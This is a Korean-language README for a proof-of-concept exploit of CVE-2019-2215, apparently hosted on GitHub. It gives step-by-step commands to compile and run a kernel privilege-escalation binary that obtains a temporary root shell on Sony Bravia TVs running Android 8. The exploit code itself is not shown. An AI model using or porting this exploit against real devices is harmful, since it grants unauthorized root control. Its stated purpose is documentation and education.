
CVE-2019-2215를 통한 Bravia TV용 Temproot.
CVE-2019-2215를 통한 Bravia TV용 Temproot.
커널 메모리 R/W 전용 권한 상승 공격을 통해 임시 루트 셸을 얻는 데모입니다.
이 도구는 커널 버전 4.9.51을 사용하는 Android 8(PKG6.0724) 펌웨어가 실행되는 Sony Bravia TV 장치에서 작동합니다.
이 도구가 동일한 취약점의 영향을 받는 다른 장치 및/또는 커널에서 작동하려면 일부 오프셋을 찾아 변경해야 합니다. Project Zero 버그트래커에서 언급한 대로, 이는 그리 어렵지 않습니다.
이 도구와 그 소스 코드는 문서화 및 교육 목적으로만 제공됩니다.
이 도구를 사용하면 기기가 벽돌이 될 수 있습니다. 자신이 무엇을 하고 있는지 모른다면 시도하지 마십시오.
# Download the Android NDK.
user@host:~$ wget https://dl.google.com/android/repository/android-ndk-r20b-linux-x86_64.zip
# Extract the NDK and set its path as $ANDROID_NDK_HOME.
user@host:~$ unzip android-ndk-r20b-linux-x86_64.zip
user@host:~$ export ANDROID_NDK_HOME=~/android-ndk-r20b
# Clone the `CVE-2019-2215` git repository and `cd` into it.
user@host:~$ git clone https://github.com/LIznzn/CVE-2019-2215.git
user@host:~$ cd CVE-2019-2215
# Compile the binary.
user@host:~/CVE-2019-2215$ $ANDROID_NDK_HOME/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android21-clang poc-bravia.c -static -o poc-bravia
# Push binary to device.
user@host:~/CVE-2019-2215$ adb push ./poc-bravia /data/local/tmp/
# Use ADB Shell.
user@host:~/CVE-2019-2215$ adb shell
# Run it.
BRAVIA_4K_UR1:/ $ cd /data/local/tmp
BRAVIA_4K_UR1:/data/local/tmp $ chmod 755 poc-bravia
BRAVIA_4K_UR1:/data/local/tmp $ ./poc-bravia